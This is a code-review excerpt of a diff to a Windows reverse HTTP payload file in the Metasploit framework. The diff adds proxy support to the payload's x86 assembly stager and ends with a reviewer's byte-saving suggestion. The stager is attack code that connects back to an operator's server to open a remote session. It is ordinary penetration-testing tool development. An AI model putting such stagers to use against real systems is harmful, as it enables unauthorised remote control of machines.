lib/msf/core/payload/windows/reverse_http.rb

```diff
@@ -172,45 +206,103 @@ def asm_reverse_http(opts={})
-                               ; LPCTSTR lpszProxyName (NULL) [3]
-                               ; DWORD dwAccessType (PRECONFIG = 0) [4]
-                               ; LPCTSTR lpszAgent (NULL) [5]
-        push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
-        call ebp
 
+        xor ebx, ebx           ; Set ebx to NULL to use in future arguments
+      ^
+
+    if proxy_enabled
+      asm << %Q^
+        call get_proxy_server
+          db "#{proxy_info}", 0x00
+        get_proxy_server:
+          pop ecx
+        internetopen:
+          push ebx               ; DWORD dwFlags
+          push esp               ; LPCTSTR lpszProxyBypass ("" = empty string)
+          push ecx               ; LPCTSTR lpszProxyName (NULL)
+          push.i8 3              ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
+          push ebx               ; LPCTSTR lpszAgent (NULL)
+          push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+          call ebp
+        ^
+    else
+      asm << %Q^
+        internetopen:
+          push ebx               ; DWORD dwFlags
+          push ebx               ; LPCTSTR lpszProxyBypass (NULL)
+          push ebx               ; LPCTSTR lpszProxyName (NULL)
+          push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
+          push ebx               ; LPCTSTR lpszAgent (NULL)
+          push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+          call ebp
+        ^
+    end
+
+    asm << %Q^
       internetconnect:
-                               ; DWORD_PTR dwContext (NULL) [6]
-                               ; dwFlags [7]
+        push ebx               ; DWORD_PTR dwContext (NULL)
+        push ebx               ; dwFlags
         push.i8 3              ; DWORD dwService (INTERNET_SERVICE_HTTP)
         push ebx               ; password (NULL)
         push ebx               ; username (NULL)
         push #{opts[:port]}    ; PORT
         call got_server_uri    ; double call to get pointer for both server_uri and
-      server_uri:              ;  server_host; server_uri is saved in EDI for later
+      server_uri:              ; server_host; server_uri is saved in EDI for later
         db "#{opts[:url]}", 0x00
       got_server_host:
-        push eax               ; HINTERNET hInternet
+        push eax               ; HINTERNET hInternet (still in eax from InternetOpenA)
         push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
         call ebp
+        mov esi, eax           ; Store hConnection in esi
+      ^
 
+    # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it
+    # doesn't set the Proxy-Authorization header on the CONNECT request.
+
+    if proxy_enabled && proxy_user
+      asm << %Q^
+          call set_proxy_username
+        proxy_username:
+          db "#{proxy_user}",0x00
+        set_proxy_username:
+          pop ecx              ; Save the proxy username into ecx
```

Comment:
I think you can save two bytes here by replacing the `push`/`pop` with just having the `call` inline